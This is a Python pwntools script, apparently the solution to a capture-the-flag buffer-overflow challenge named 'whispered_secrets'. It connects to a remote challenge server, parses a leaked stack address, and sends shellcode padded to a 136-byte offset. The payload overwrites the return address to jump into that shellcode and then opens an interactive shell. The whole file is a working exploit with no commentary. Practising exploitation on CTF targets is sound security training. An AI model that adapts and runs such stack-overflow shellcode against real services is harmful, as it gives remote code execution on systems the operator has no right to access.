OffSec-CTF/BOF/02_whispered_secrets/solve.py

#!/usr/bin/env python3
from pwn import *

context.binary = elf = ELF("whispered_secrets", checksec=False)
context.arch = "amd64"
context.os = "linux"

OFFSET_TO_RIP = 136

p = remote("offsec.m0lecon.it", 13528)

leak_line = p.recvline_contains(b"secret:")
buf_addr = int(leak_line.split(b"secret: ")[1].strip(), 16)
log.info(f"buf = {buf_addr:#x}")
# NX disabled
shellcode = asm(shellcraft.sh())

payload = flat(shellcode, b"A" * (OFFSET_TO_RIP - len(shellcode)), p64(buf_addr))
p.sendafter(b"secret:\n", payload)
p.interactive()